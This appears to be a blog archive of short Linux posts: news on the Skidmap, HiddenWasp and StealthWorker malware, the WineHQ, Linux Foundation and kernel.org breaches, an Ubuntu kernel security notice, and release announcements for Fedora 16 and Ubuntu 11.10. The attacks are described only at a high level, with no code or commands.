Skidmap, Linux Malware Mining Cryptocurrency in Disguise



A new strain of Linux malware has been discovered by security researchers, which is configured to carry out a multitude of malicious activities besides just illegally mining cryptocurrency; by using a "secret master password" it provides hackers the universal access to the system.

Skidmap, Linux malware demonstrates the increased convolutions in Cryptocurrency mining malware and prevalence of the corresponding threats.

In order to carry out its cryptocurrency mining in disguise, Skidmap forges CPU-related statistics and network traffic, according to TrendMicro's recent blog on the subject.

Highlighting the advanced methods used by Skidmap, researchers at TrendMicro said, "Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean compared to other malware."

“Cryptocurrency-mining threats don’t just affect a server or workstation’s performance — they could also translate to higher expenses and even disrupt businesses especially if they are used to run mission-critical operations,” reads the blog.

How the infection takes place?

It starts in 'crontab', which is a standard Linux process which is responsible for periodically scheduling timed tasks in Unix-like systems. After that, Skidmap installs various malicious binaries and then the security settings of the affected machine are being minimized to start the cryptocurrency mining smoothly.

As the cryptocurrency miners generate digital money for the hackers, they are being monitored by some additional binaries put into the system for the same.

To stay guarded against the aforementioned Cryptocurrency mining malware, admins are advised to update and patch their servers and machines ,and be alert to unverified repositories.


Undetected malware attacks Linux systems

A new sophisticated, unique Linux malware dubbed HiddenWasp used in targeted attacks against victim’s who are already under attack or gone through a heavy reconnaissance.

The malware is highly sophisticated and went undetected; the malware is still active and has a zero detection rate. The malware adopted a massive amount of codes from publically available malware such as Mirai and the Azazel rootkit.

Unlike Windows malware, Linux malware authors won’t concentrate much with evasion techniques, as the trend of using Anti-Virus solutions in Linux machine is very less when compared to other platforms.

However, the Intezer report shows “malware with strong evasion techniques does exist for the Linux platform. There is also a high ratio of publicly available open-source malware that utilizes strong evasion techniques and can be easily adapted by attackers.” In the past, we saw many malware focussed on crypto-mining or DDoS activity, but the HiddenWasp is purely a targeted remote control attack.

The malware is composed of a user-mode rootkit, a trojan, and an initial deployment script. Researchers spotted the files went undetected in VirusTotal and the malware hosted in servers of a hosting company ThinkDream located in Hong Kong.

While analyzing scripts, Intezer spotted a user named ‘sftp’ and hardcodes, which can be used for initial compromise and also the scripts has variable to clear the older versions from the compromised systems.

The scripts also include variables to determine server architecture of the compromised system and download components from the malicious server based on the compromised server architecture. Once the components installed, the trojan will get executed on the system.

“Within this script, we were able to observe that the main implants were downloaded in the form of tarballs. As previously mentioned, each tarball contains the main trojan, the rootkit, and a deployment script for x86 and x86_64 builds accordingly.”

StealthWorker: Manipulates Compromised E-Commerce Websites To Attack Windows and Linux Platforms




A new brute-force malware which goes by the name of StealthWorker was recently uncovered. This malware allegedly uses compromised e-commerce websites to steal personal data.

The platforms that have majorly been affected by this malware are Linux and windows.

Personal information and payment data are the basic motivations behind these malware attacks.

The malware is written in a very unique and rarely used language “Golang” which is already being used by the Mirai botnet development module.

To make all this happen the e-commerce websites are first compromised by employing an embedded skimmer.

The vulnerabilities of the websites are manipulated by either battering the plugin vulnerabilities or making use of a Content Management System (CMS).

The malware emerged while the researchers were analyzing the command and control server (5.45.69[.]149).

That’s where they found the storage directory with samples intending to brute force a source admin tool.

There have been previous versions of this malware which had only windows on their radar.

But the latest version happens to have server payload binaries to get into Linux as well.

One of the samples that the researchers were working on is “PhpMyAdminBrut_Windows_x86.exe” where an IP was found which led to a web panel login with an array of new samples.

Some open directories were also found which comprised of new file names which indicated towards IoT devices with ARM and Mips structures.

StealthWorker works on a routine execution to ensure that the malware stays even after the system’s rebooted.

The researchers also used the IDA python script to look for other f malicious functions.

Out of research it was also found out that other platforms and services are also on the target list namely, FTP, Joomla, cpanel, Mysql, SSH and others.

Furthermore, other major moves are also being made on the part of the cyber-cons towards infecting an extensive variety of platforms.

Hacker Group make Nintendo Switch a Linux machine

As reported earlier this month, Hacker Group fail0verflow had tweeted a picture showing that they had managed to run Linux on Nintendo Switch. That was February 6; now, 12 days later, they have released a video on their account, providing proof of the same.

The video shows a Switch console running a Linux-based desktop environment KDE Plasma, with full touchscreen support and a web browser, something which the gaming console did not originally have.


While usually people hack into gaming consoles to play cracked versions of games, some people just enjoy running whatever kind of software they want on them. This seems to be one of those cases.

Fail0verflow is a hacking group that focuses its hacking efforts on gaming consoles and has recently taken up Nintendo Switch, as have many others.

While the hacking group has still not made public their exact method and code, it reportedly involves exploiting a flaw in the boot ROM of the Switch’s Nvidia Tegra X1 chip. As they revealed last time, the video maintains that the flaw can’t be patched up by Nintendo on current devices but allegedly can be discussed in future production.

Fedora 16 Linux Released (Codename "Verne")



Today , Fedora 16(codename "verne") Linux Released, powered by the newly released Linux kernel 3.1, it features the GNOME 3.2.1 desktop environment with the GNOME Shell interface and the KDE Software Compilation 4.7.2 environment. Fedora 16 includes OpenStack, lots of SELinux enhancements, updated Haskell, Perl and Ada environments, Blender 2.5, Boost 1.47, TigerVNC 1.1, and much more.

The following are major features for Fedora 16:

  • Enhanced cloud support including Aeolus Conductor, Condor Cloud, HekaFS, OpenStack and pacemaker-cloud
  • KDE Plasma workspaces 4.7
  • GNOME 3.2
  • A number of core system improvements including GRUB 2 and the removal of HAL.
  • An updated libvirtd, trusted boot, guest inspection, virtual lock manager and a pvops based kernel for Xen all improve virtualization support.
Full feature list here

Fedora 16:

Ubuntu 11.10(Oneiric Ocelot) is Released ~ Upgrade Now


Recently, Ubuntu released Ubuntu 11.10.  If you interested to know how it will look like or how it works, you can take this tour. It is available in 38 language.  Ubuntu is free to use. if you haven't use ubuntu yet, then give a try now with Ubuntu
11.10.

You can download the full operating system from here:
http://www.ubuntu.com/download
or
if you have installed ubuntu 11.04 , you will be asked to upgrade to Ubuntu 11.10(that's how i come to know about it).
  
Ubuntu 11.10: Open for business
Make your IT budget go further with Ubuntu! The latest release of Ubuntu includes everything you need for your business desktop, server and cloud.

The user Interface looks good. I am curious to use it now itself but my net connection.

Few Screenshots:


Linux Application WineHQ database Hacked

WineHQ database system is compromised. WinHQ is Linux Application that helps to run the .exe file inside the Linux. The hacker might get the access by compromising an admins credentials, or by
exploiting an unpatched vulnerability in phpmyadmin.

They had reluctantly provided access to phpmyadmin to the appdb developers (it is a very handy tool, and something they very much wanted). But it is a prime target for hackers, and apparently our best efforts at obscuring it and patching it were not sufficient.

Now they removed all access to the PhpMyAdmin from outside.

Still now, there is no harm to Database.Unfortunately, the attackers were able to download the full login database for both the appdb and bugzilla. This means that they have all
of those emails, as well as the passwords. The passwords are stored
as Encrypted(Hash), but with enough effort and depending on the quality of the
password, they can be cracked .

He afraid about the users information. The attacker can use those information and get access to the Users Account. So he planned to reset the password and send to the email user.

Security Tips from BreakTheSec:
  •  Don't Use the same password everywhere.(especially use different and secure password for gmail account and other important accounts)
  • @WineHQ's users: If you use the same password anywhere else, Change it immediately.  



Ubuntu 10.10 vulnerable to system crash and DOS attack

kernel incorrectly handled certain VLAN packets leading to a remote attacker could send specially crafted traffic to crash the system, leading to a denial of service. EFI GUID partition table was not correctly parsed leading to  A physically local attacker that could insert mountable devices could exploit this to crash the system or possibly gain root privileges.
==========================================================================
Ubuntu Security Notice USN-1220-1
September 29, 2011

linux-ti-omap4 vulnerabilities
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 10.10

Summary:

Multiple kernel flaws have been fixed.

Software Description:
- linux-ti-omap4: Linux kernel for OMAP4

Details:

Ryan Sweat discovered that the kernel incorrectly handled certain VLAN
packets. On some systems, a remote attacker could send specially crafted
traffic to crash the system, leading to a denial of service.
(CVE-2011-1576)

Timo Warns discovered that the EFI GUID partition table was not correctly
parsed. A physically local attacker that could insert mountable devices
could exploit this to crash the system or possibly gain root privileges.
(CVE-2011-1776)

Dan Rosenberg discovered that the IPv4 diagnostic routines did not
correctly validate certain requests. A local attacker could exploit this to
consume CPU resources, leading to a denial of service. (CVE-2011-2213)

Dan Rosenberg discovered that the Bluetooth stack incorrectly handled
certain L2CAP requests. If a system was using Bluetooth, a remote attacker
could send specially crafted traffic to crash the system or gain root
privileges. (CVE-2011-2497)

Mauro Carvalho Chehab discovered that the si4713 radio driver did not
correctly check the length of memory copies. If this hardware was
available, a local attacker could exploit this to crash the system or gain
root privileges. (CVE-2011-2700)

Herbert Xu discovered that certain fields were incorrectly handled when
Generic Receive Offload (CVE-2011-2723)

Time Warns discovered that long symlinks were incorrectly handled on Be
filesystems. A local attacker could exploit this with a malformed Be
filesystem and crash the system, leading to a denial of service.
(CVE-2011-2928)

Dan Kaminsky discovered that the kernel incorrectly handled random sequence
number generation. An attacker could use this flaw to possibly predict
sequence numbers and inject packets. (CVE-2011-3188)

Darren Lavender discovered that the CIFS client incorrectly handled certain
large values. A remote attacker with a malicious server could exploit this
to crash the system or possibly execute arbitrary code as the root user.
(CVE-2011-3191)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 10.10:
linux-image-2.6.35-903-omap4 2.6.35-903.25

After a standard system update you need to reboot your computer to make
all the necessary changes.

References:
http://www.ubuntu.com/usn/usn-1220-1
CVE-2011-1576, CVE-2011-1776, CVE-2011-2213, CVE-2011-2497,
CVE-2011-2700, CVE-2011-2723, CVE-2011-2928, CVE-2011-3188,
CVE-2011-3191

Package Information:
https://launchpad.net/ubuntu/+source/linux-ti-omap4/2.6.35-903.25


Update about Linux Foundation Security Breach

Last week, Linux websites are hacked by some unknown Hackers.  So All linux foundation websites are down for maintenance.  They put message about security breach on their main page.  Linux.com is still in maintenance.  This is official FAQ from Linux.com about the Security Breach.


We want to thank you for your questions and your support. We hope this FAQ can help address some of your inquiries.
Q: When will Linux Foundation services, such as events, training and Linux.com be back online?
Our team is working around the clock to restore these important services. We are working with authorities and exercising both extreme caution and diligence. Services will begin coming back online in the coming days and will keep you informed every step of the way.
Q: Were passwords stored in plaintext?
The Linux Foundation does not store passwords in plaintext. However an attacker with access to stored password would have direct access to conduct a brute force attack. An in-depth analysis of direct-access brute forcing, as it relates to password strength, can be read at http://www.schneier.com/blog/archives/2007/01/choosing_secure.html. We encourage you to use extreme caution, as is the case in any security breach, and discontinue the use of that password if you re-use it across other sites.
Q: Does my Linux.com email address work?
Yes, Linux.com email addresses are working and safe to use.
Q: What do you know about the source of the attack?
We are aggressively investigating the source of the attack. Unfortunately, we can't elaborate on this for the time being.
Q: Is there anything I can do to help?
We want to thank everyone who has expressed their support while we address this breach. We ask you to be patient as we do everything possible to restore services as quickly as possible.


Linux Foundation Websites(kernel.org,linux.com) Hacked ~Security Breach


Shocking News for those who think Linux is secure.  Yes, the websites belonging to Linux Foundation are under attack of Hackers.  Hackers breached Linux.com, linuxfoundation.org and www.kernel.org yesterday.

The sites have been taken down with a notice put up stating that the sites are down for maintenance due to a security breach. The breach was said to have been discovered on the 8th of September, this year.

Last month Security breach hit kernel.org (Intruders gained root access on the server Hera...)

The notice also cautions users that any passwords that might have been used on any of the services might have been compromised. If those same passwords were used on any other services, it’s recommended that they be changed.

The site is still down for maintenance. 

The Message from Linux Foundation:
When i try to visit the linux.com , i got this:
-----------------------------------------------------------------------------------------------------------------------
Linux Foundation infrastructure including LinuxFoundation.org, Linux.com, and their subdomains are down for maintenance due to a security breach that was discovered on September 8, 2011. The Linux Foundation made this decision in the interest of extreme caution and security best practices. We believe this breach was connected to the intrusion on kernel.org.

We are in the process of restoring services in a secure manner as quickly as possible. As with any intrusion and as a matter of caution, you should consider the passwords and SSH keys that you have used on these sites compromised. If you have reused these passwords on other sites, please change them immediately. We are currently auditing all systems and will update this statement when we have more information.

We apologize for the inconvenience. We are taking this matter seriously and appreciate your patience. The Linux Foundation infrastructure houses a variety of services and programs including Linux.com, Open Printing, Linux Mark, Linux Foundation events and others, but does not include the Linux kernel or its code repositories.

Please contact us at info@linuxfoundation.org with questions about this matter.

The Linux Foundation
-----------------------------------------------------------------------------------------------------------------------


Kernel.org, the victim of the attack is critical to the Linux movement as it houses the Linux kernel itself. The servers are being completely reinstalled from scratch. There was some fear that hackers might have modified the code of the kernel. Kernel.org has made it clear that this isn’t the case. Each of the code files are hash verified, so no alteration can go unnoticed. A check will be done to ensure that no changes have been made.

The news of this hacking might come as a surprise to some, as it’s popular belief that sites running on Linux are almost impossible to hack.

Security breach on kernel.org

Security Breach occurred on Kernel.org. This is news from their official Website:

Earlier this month, a number of servers in the kernel.org infrastructure were compromised. We discovered this August 28th. While we currently believe that the source code repositories were unaffected, we are in the process of verifying this and taking steps to enhance security across the kernel.org infrastructure.


What happened?


  •  Intruders gained root access on the server Hera. We believe they may have gained this access via a compromised user credential; how they managed to exploit that to root access is currently unknown and is being investigated.
  •  Files belonging to ssh (openssh, openssh-server and openssh-clients) were modified and running live.
  • A trojan startup file was added to the system start up scripts
  •  User interactions were logged, as well as some exploit code. We have retained this for now.
  •  Trojan initially discovered due to the Xnest /dev/mem error message w/o Xnest installed; have been seen on other systems. It is unclear if systems that exhibit this message are susceptible, compromised or not. If developers see this, and you don't have Xnest installed, please investigate.
  •  It *appears* that 3.1-rc2 might have blocked the exploit injector, we don't know if this is intentional or a side affect of another bugfix or change.


What Has Been Done so far:

  •  We have currently taken boxes off line to do a backup and are in the process of doing complete reinstalls.
  •  We have notified authorities in the United States and in Europe to assist with the investigation
  •  We will be doing a full reinstall on all boxes on kernel.org
  •  We are in the process of doing an analysis on the code within git, and the tarballs to confirm that nothing has been modified

The Linux community and kernel.org take the security of the kernel.org domain extremely seriously, and are pursuing all avenues to investigate this attack and prevent future ones.


However, it's also useful to note that the potential damage of cracking kernel.org is far less than typical software repositories. That's because kernel development takes place using the git distributed revision control system, designed by Linus Torvalds. For each of the nearly 40,000 files in the Linux kernel, a cryptographically secure SHA-1 hash is calculated to uniquely define the exact contents of that file. Git is designed so that the name of each version of the kernel depends upon the complete development history leading up to that version. Once it is published, it is not possible to change the old versions without it being noticed.


Those files and the corresponding hashes exist not just on the kernel.org machine and its mirrors, but on the hard drives of each several thousand kernel developers, distribution maintainers, and other users of kernel.org. Any tampering with any file in the kernel.org repository would immediately be noticed by each developer as they updated their personal repository, which most do daily.


We are currently working with the 448 users of kernel.org to change their credentials and change their SSH keys.


We are also currently auditing all security policies to make kernel.org more secure, but are confident that our systems, specifically git, have excellent design to prevent real damage from these types of attacks.

Source: Kernel


Backbox.org-Linux Distribution Website Hacked

BackBox is a Linux distribution based on Ubuntu Lucid 10.04 LTS developed to perform penetration tests and security assessments. Designed to be fast, easy to use and to provide a minimal yet complete desktop environment thanks to its own software repositories always been updated to the last stable version of the most known and used ethical hacking tools.


Top 10 Reasons Why Linux is better than Windows

1. It Doesn''t Crash

Linux has been time-proven to be a reliable operating system. Although the desktop is not a new place for Linux, most Linux-based systems have been used as servers and embedded systems. High-visibility Web sites such as Google use Linux-based systems, but you also can find Linux inside the TiVo set-top box in many livingrooms.